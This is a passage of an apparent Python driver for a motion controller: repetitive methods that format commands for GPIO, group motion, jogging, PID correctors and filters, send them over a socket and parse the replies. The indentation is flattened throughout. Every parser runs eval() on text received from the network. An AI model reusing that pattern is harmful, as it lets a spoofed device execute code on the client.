command = 'GPIOAnalogGainGet('
for i in range(len(GPIOName)):
if (i > 0):
command += ','
command += GPIOName[i] + ',' + 'int *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(len(GPIOName)):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GPIOAnalogGainSet : Set analog input gain (1, 2, 4 or 8) for one or few input
def GPIOAnalogGainSet (self, socketId, GPIOName, AnalogInputGainValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIOAnalogGainSet('
for i in range(len(GPIOName)):
if (i > 0):
command += ','
command += GPIOName[i] + ',' + str(AnalogInputGainValue[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GPIODigitalGet : Read digital output or digital input
def GPIODigitalGet (self, socketId, GPIOName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIODigitalGet(' + GPIOName + ',unsigned short *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# GPIODigitalSet : Set Digital Output for one or few output TTL
def GPIODigitalSet (self, socketId, GPIOName, Mask, DigitalOutputValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIODigitalSet(' + GPIOName + ',' + str(Mask) + ',' + str(DigitalOutputValue) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupAccelerationSetpointGet : Return setpoint accelerations
def GroupAccelerationSetpointGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupAccelerationSetpointGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupAnalogTrackingModeEnable : Enable Analog Tracking mode on selected group
def GroupAnalogTrackingModeEnable (self, socketId, GroupName, Type):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupAnalogTrackingModeEnable(' + GroupName + ',' + Type + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupAnalogTrackingModeDisable : Disable Analog Tracking mode on selected group
def GroupAnalogTrackingModeDisable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupAnalogTrackingModeDisable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupCorrectorOutputGet : Return corrector outputs
def GroupCorrectorOutputGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupCorrectorOutputGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupCurrentFollowingErrorGet : Return current following errors
def GroupCurrentFollowingErrorGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupCurrentFollowingErrorGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupHomeSearch : Start home search sequence
def GroupHomeSearch (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupHomeSearch(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupHomeSearchAndRelativeMove : Start home search sequence and execute a displacement
def GroupHomeSearchAndRelativeMove (self, socketId, GroupName, TargetDisplacement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupHomeSearchAndRelativeMove(' + GroupName + ','
for i in range(len(TargetDisplacement)):
if (i > 0):
command += ','
command += str(TargetDisplacement[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupInitialize : Start the initialization
def GroupInitialize (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupInitialize(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupInitializeWithEncoderCalibration : Start the initialization with encoder calibration
def GroupInitializeWithEncoderCalibration (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupInitializeWithEncoderCalibration(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupJogParametersSet : Modify Jog parameters on selected group and activate the continuous move
def GroupJogParametersSet (self, socketId, GroupName, Velocity, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupJogParametersSet(' + GroupName + ','
for i in range(len(Velocity)):
if (i > 0):
command += ','
command += str(Velocity[i]) + ',' + str(Acceleration[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupJogParametersGet : Get Jog parameters on selected group
def GroupJogParametersGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupJogParametersGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *' + ',' + 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement*2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupJogCurrentGet : Get Jog current on selected group
def GroupJogCurrentGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupJogCurrentGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *' + ',' + 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement*2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupJogModeEnable : Enable Jog mode on selected group
def GroupJogModeEnable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupJogModeEnable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupJogModeDisable : Disable Jog mode on selected group
def GroupJogModeDisable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupJogModeDisable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupKill : Kill the group
def GroupKill (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupKill(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupMoveAbort : Abort a move
def GroupMoveAbort (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupMoveAbort(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupMoveAbsolute : Do an absolute move
def GroupMoveAbsolute (self, socketId, GroupName, TargetPosition):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupMoveAbsolute(' + GroupName + ','
for i in range(len(TargetPosition)):
if (i > 0):
command += ','
command += str(TargetPosition[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupMoveRelative : Do a relative move
def GroupMoveRelative (self, socketId, GroupName, TargetDisplacement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupMoveRelative(' + GroupName + ','
for i in range(len(TargetDisplacement)):
if (i > 0):
command += ','
command += str(TargetDisplacement[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupMotionDisable : Set Motion disable on selected group
def GroupMotionDisable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupMotionDisable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupMotionEnable : Set Motion enable on selected group
def GroupMotionEnable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupMotionEnable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupPositionCorrectedProfilerGet : Return corrected profiler positions
def GroupPositionCorrectedProfilerGet (self, socketId, GroupName, PositionX, PositionY):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupPositionCorrectedProfilerGet(' + GroupName + ',' + str(PositionX) + ',' + str(PositionY) + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupPositionCurrentGet : Return current positions
def GroupPositionCurrentGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupPositionCurrentGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupPositionPCORawEncoderGet : Return PCO raw encoder positions
def GroupPositionPCORawEncoderGet (self, socketId, GroupName, PositionX, PositionY):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupPositionPCORawEncoderGet(' + GroupName + ',' + str(PositionX) + ',' + str(PositionY) + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupPositionSetpointGet : Return setpoint positions
def GroupPositionSetpointGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupPositionSetpointGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupPositionTargetGet : Return target positions
def GroupPositionTargetGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupPositionTargetGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupReferencingActionExecute : Execute an action in referencing mode
def GroupReferencingActionExecute (self, socketId, PositionerName, ReferencingAction, ReferencingSensor, ReferencingParameter):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupReferencingActionExecute(' + PositionerName + ',' + ReferencingAction + ',' + ReferencingSensor + ',' + str(ReferencingParameter) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupReferencingStart : Enter referencing mode
def GroupReferencingStart (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupReferencingStart(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupReferencingStop : Exit referencing mode
def GroupReferencingStop (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupReferencingStop(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupStatusGet : Return group status
def GroupStatusGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupStatusGet(' + GroupName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# GroupStatusStringGet : Return the group status string corresponding to the group status code
def GroupStatusStringGet (self, socketId, GroupStatusCode):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupStatusStringGet(' + str(GroupStatusCode) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupVelocityCurrentGet : Return current velocities
def GroupVelocityCurrentGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupVelocityCurrentGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# KillAll : Put all groups in 'Not initialized' state
def KillAll (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'KillAll()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerAnalogTrackingPositionParametersGet : Read dynamic parameters for one axe of a group for a future analog tracking position
def PositionerAnalogTrackingPositionParametersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerAnalogTrackingPositionParametersGet(' + PositionerName + ',char *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerAnalogTrackingPositionParametersSet : Update dynamic parameters for one axe of a group for a future analog tracking position
def PositionerAnalogTrackingPositionParametersSet (self, socketId, PositionerName, GPIOName, Offset, Scale, Velocity, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerAnalogTrackingPositionParametersSet(' + PositionerName + ',' + GPIOName + ',' + str(Offset) + ',' + str(Scale) + ',' + str(Velocity) + ',' + str(Acceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerAnalogTrackingVelocityParametersGet : Read dynamic parameters for one axe of a group for a future analog tracking velocity
def PositionerAnalogTrackingVelocityParametersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerAnalogTrackingVelocityParametersGet(' + PositionerName + ',char *,double *,double *,double *,int *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(6):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerAnalogTrackingVelocityParametersSet : Update dynamic parameters for one axe of a group for a future analog tracking velocity
def PositionerAnalogTrackingVelocityParametersSet (self, socketId, PositionerName, GPIOName, Offset, Scale, DeadBandThreshold, Order, Velocity, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerAnalogTrackingVelocityParametersSet(' + PositionerName + ',' + GPIOName + ',' + str(Offset) + ',' + str(Scale) + ',' + str(DeadBandThreshold) + ',' + str(Order) + ',' + str(Velocity) + ',' + str(Acceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerBacklashGet : Read backlash value and status
def PositionerBacklashGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerBacklashGet(' + PositionerName + ',double *,char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerBacklashSet : Set backlash value
def PositionerBacklashSet (self, socketId, PositionerName, BacklashValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerBacklashSet(' + PositionerName + ',' + str(BacklashValue) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerBacklashEnable : Enable the backlash
def PositionerBacklashEnable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerBacklashEnable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerBacklashDisable : Disable the backlash
def PositionerBacklashDisable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerBacklashDisable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorNotchFiltersSet : Update filters parameters
def PositionerCorrectorNotchFiltersSet (self, socketId, PositionerName, NotchFrequency1, NotchBandwith1, NotchGain1, NotchFrequency2, NotchBandwith2, NotchGain2):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorNotchFiltersSet(' + PositionerName + ',' + str(NotchFrequency1) + ',' + str(NotchBandwith1) + ',' + str(NotchGain1) + ',' + str(NotchFrequency2) + ',' + str(NotchBandwith2) + ',' + str(NotchGain2) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorNotchFiltersGet : Read filters parameters
def PositionerCorrectorNotchFiltersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorNotchFiltersGet(' + PositionerName + ',double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(6):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCorrectorPIDFFAccelerationSet : Update corrector parameters
def PositionerCorrectorPIDFFAccelerationSet (self, socketId, PositionerName, ClosedLoopStatus, KP, KI, KD, KS, IntegrationTime, DerivativeFilterCutOffFrequency, GKP, GKI, GKD, KForm, FeedForwardGainAcceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDFFAccelerationSet(' + PositionerName + ',' + str(ClosedLoopStatus) + ',' + str(KP) + ',' + str(KI) + ',' + str(KD) + ',' + str(KS) + ',' + str(IntegrationTime) + ',' + str(DerivativeFilterCutOffFrequency) + ',' + str(GKP) + ',' + str(GKI) + ',' + str(GKD) + ',' + str(KForm) + ',' + str(FeedForwardGainAcceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorPIDFFAccelerationGet : Read corrector parameters
def PositionerCorrectorPIDFFAccelerationGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDFFAccelerationGet(' + PositionerName + ',bool *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(12):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCorrectorPIDFFVelocitySet : Update corrector parameters
def PositionerCorrectorPIDFFVelocitySet (self, socketId, PositionerName, ClosedLoopStatus, KP, KI, KD, KS, IntegrationTime, DerivativeFilterCutOffFrequency, GKP, GKI, GKD, KForm, FeedForwardGainVelocity):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDFFVelocitySet(' + PositionerName + ',' + str(ClosedLoopStatus) + ',' + str(KP) + ',' + str(KI) + ',' + str(KD) + ',' + str(KS) + ',' + str(IntegrationTime) + ',' + str(DerivativeFilterCutOffFrequency) + ',' + str(GKP) + ',' + str(GKI) + ',' + str(GKD) + ',' + str(KForm) + ',' + str(FeedForwardGainVelocity) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorPIDFFVelocityGet : Read corrector parameters
def PositionerCorrectorPIDFFVelocityGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDFFVelocityGet(' + PositionerName + ',bool *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(12):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCorrectorPIDDualFFVoltageSet : Update corrector parameters
def PositionerCorrectorPIDDualFFVoltageSet (self, socketId, PositionerName, ClosedLoopStatus, KP, KI, KD, KS, IntegrationTime, DerivativeFilterCutOffFrequency, GKP, GKI, GKD, KForm, FeedForwardGainVelocity, FeedForwardGainAcceleration, Friction):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDDualFFVoltageSet(' + PositionerName + ',' + str(ClosedLoopStatus) + ',' + str(KP) + ',' + str(KI) + ',' + str(KD) + ',' + str(KS) + ',' + str(IntegrationTime) + ',' + str(DerivativeFilterCutOffFrequency) + ',' + str(GKP) + ',' + str(GKI) + ',' + str(GKD) + ',' + str(KForm) + ',' + str(FeedForwardGainVelocity) + ',' + str(FeedForwardGainAcceleration) + ',' + str(Friction) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorPIDDualFFVoltageGet : Read corrector parameters
def PositionerCorrectorPIDDualFFVoltageGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDDualFFVoltageGet(' + PositionerName + ',bool *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(14):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCorrectorPIPositionSet : Update corrector parameters
def PositionerCorrectorPIPositionSet (self, socketId, PositionerName, ClosedLoopStatus, KP, KI, IntegrationTime):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIPositionSet(' + PositionerName + ',' + str(ClosedLoopStatus) + ',' + str(KP) + ',' + str(KI) + ',' + str(IntegrationTime) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorPIPositionGet : Read corrector parameters
def PositionerCorrectorPIPositionGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIPositionGet(' + PositionerName + ',bool *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCorrectorTypeGet : Read corrector type
def PositionerCorrectorTypeGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorTypeGet(' + PositionerName + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCurrentVelocityAccelerationFiltersGet : Get current velocity and acceleration cutoff frequencies
def PositionerCurrentVelocityAccelerationFiltersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCurrentVelocityAccelerationFiltersGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCurrentVelocityAccelerationFiltersSet : Set current velocity and acceleration cutoff frequencies
def PositionerCurrentVelocityAccelerationFiltersSet (self, socketId, PositionerName, CurrentVelocityCutOffFrequency, CurrentAccelerationCutOffFrequency):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCurrentVelocityAccelerationFiltersSet(' + PositionerName + ',' + str(CurrentVelocityCutOffFrequency) + ',' + str(CurrentAccelerationCutOffFrequency) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerDriverFiltersGet : Get driver filters parameters
def PositionerDriverFiltersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverFiltersGet(' + PositionerName + ',double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(5):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerDriverFiltersSet : Set driver filters parameters
def PositionerDriverFiltersSet (self, socketId, PositionerName, KI, NotchFrequency, NotchBandwidth, NotchGain, LowpassFrequency):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverFiltersSet(' + PositionerName + ',' + str(KI) + ',' + str(NotchFrequency) + ',' + str(NotchBandwidth) + ',' + str(NotchGain) + ',' + str(LowpassFrequency) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerDriverPositionOffsetsGet : Get driver stage and gage position offset
def PositionerDriverPositionOffsetsGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverPositionOffsetsGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerDriverStatusGet : Read positioner driver status
def PositionerDriverStatusGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverStatusGet(' + PositionerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerDriverStatusStringGet : Return the positioner driver status string corresponding to the positioner error code
def PositionerDriverStatusStringGet (self, socketId, PositionerDriverStatus):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverStatusStringGet(' + str(PositionerDriverStatus) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerEncoderAmplitudeValuesGet : Read analog interpolated encoder amplitude values
def PositionerEncoderAmplitudeValuesGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerEncoderAmplitudeValuesGet(' + PositionerName + ',double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerEncoderCalibrationParametersGet : Read analog interpolated encoder calibration parameters
def PositionerEncoderCalibrationParametersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerEncoderCalibrationParametersGet(' + PositionerName + ',double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
